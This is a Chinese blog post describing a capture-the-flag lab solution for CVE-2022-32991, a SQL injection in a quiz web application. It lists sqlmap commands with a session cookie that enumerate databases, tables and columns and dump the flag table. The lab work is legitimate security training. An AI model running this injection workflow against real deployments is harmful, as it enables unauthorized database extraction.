春秋云镜 CVE-2022-32991

已于 2023-06-21 15:59:22 修改
阅读量403 收藏 1
点赞数 1
分类专栏: 靶场 文章标签: web安全
于 2023-06-21 15:51:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22002773/article/details/131324485
版权

春秋云镜 CVE-2022-32991 Web Based Quiz System SQL注入

靶标介绍:

该CMS的welcome.php中存在SQL注入攻击。

1、启动场景
在这里插入图片描述
2、注册任意用户

在这里插入图片描述

3、登录成功进入主页
在这里插入图片描述
http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=1
q参数存在注入,使用sqlmap尝试未果,点击3.start(任意start都可)

在这里插入图片描述

在这里插入图片描述

http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10

python3 sqlmap.py  -u "http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10"

sqlmap参数

参数详解
-u指定url
-D指定数据库名
-T指定数据表名
-C指定列名
–dbs获取数据库
–dump导出
–columns获取数据列
–tables获取数据表
–cookie指定cookie信息

在这里插入图片描述
重定向302,需添加cookie

python3 sqlmap.py  -u "http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1687146393,1687227019,1687314814; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1687328243; PHPSESSID=jcrla8optvjpmjparqm08bid4k" --dbs

在这里插入图片描述
eid参数存在注入点,获取数据库ctf中的数据表

python3 sqlmap.py  -u "http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1687146393,1687227019,1687314814; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1687328243; PHPSESSID=jcrla8optvjpmjparqm08bid4k" -D "ctf" --tables

在这里插入图片描述
获取fiag数据列

python3 sqlmap.py  -u "http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1687146393,1687227019,1687314814; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1687328243; PHPSESSID=jcrla8optvjpmjparqm08bid4k" -D "ctf" -T "flag" --columns

在这里插入图片描述

获取fiag字段

python3 sqlmap.py  -u "http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1687146393,1687227019,1687314814; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1687328243; PHPSESSID=jcrla8optvjpmjparqm08bid4k" -D "ctf" -T "flag" --dump

在这里插入图片描述
得到flag

flag{baf0a619-41fe-4d10-b44c-faa99ee79cca}

isbug0
关注
专栏目录
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
Ambition_sec的博客
11-16 687
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
记录春秋云镜CVE-2022-32991复现过程
as_adwd的博客
03-19 288
个人记录(新手小白)春秋云镜CVE的复现过程
[春秋云镜]CVE-2015-1427
niubi707的博客
11-30 5570
春秋云镜CVE-2015-1427 ElasticSearch RCE
春秋云境系列靶场记录(合集)-不再更新
最新发布
dzqxwzoe的博客
08-24 656
CVE-2022-32991:该CMSwelcome.php存在SQL注入攻击春秋云境:CVE-2022-30887CVE-2022-30887:多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的,该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。该CMSphp_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
[春秋云镜]CVE-2021-32305
niubi707的博客
12-03 6555
春秋云镜CVE-2021-32305WebSVN是一个基于Web的Subversion Repository浏览器,可以查看文件或文件夹的日志,查看文件的变化列表等。其search.php?search= 参数下过滤不严谨导致RCE。
春秋云镜 CVE-2023-1313
qq274575499的博客
04-03 1286
cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器打开/install来运行安装。
春秋云镜 CVE-2022-4230
qq274575499的博客
05-07 1653
WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
春秋云镜CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
Ambition_sec的博客
11-17 1633
春秋云镜CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
春秋云境.comCVE-2022-32991通关思路
BG_ONE的博客
12-04 1092
春秋云境.comCVE-2022-32991思路
[春秋云镜]CVE-2022-22965
niubi707的博客
11-29 867
[春秋云镜]CVE-2022-22965复现
春秋云镜 CVE-2022-29464
qq_22002773的博客
06-26 340
春秋云镜 CVE-2022-29464
[春秋云镜]CVE-2020-13933
niubi707的博客
12-03 5965
春秋云镜CVE-2020-13933Apahce Shiro 由于处理身份验证请求时出错 存在 权限绕过漏洞,远程攻击者可以发送特制的HTTP请求,绕过身份验证过程并获得对应用程序的未授权访问。
春秋云镜 CVE-2022-23134
qq_22002773的博客
07-15 347
春秋云镜 CVE-2022-23134
[春秋云镜]CVE-2022-22963
niubi707的博客
11-29 705
[春秋云镜]CVE-2022-22963复现
春秋云镜 CVE-2022-25578
qq_22002773的博客
06-30 267
春秋云镜 CVE-2022-25578
春秋云镜 CVE-2022-25411
qq_22002773的博客
07-04 575
春秋云镜 CVE-2022-25578
春秋云镜-【仿真场景】Time-writeup
渗透测试研究中心
03-07 1323
说明Time是一套难度为等的靶场环境,完成该挑战可以帮助玩家了解内网渗透的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。技术Neo4j、Kerberos、Privilege Elevation、域渗透第一个flag外网IP信息收集start infoscan (ic...
春秋云镜 CVE-2022-30887wp】
风依旧的博客
10-18 3703
春秋云镜 CVE-2022-30887 WP
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值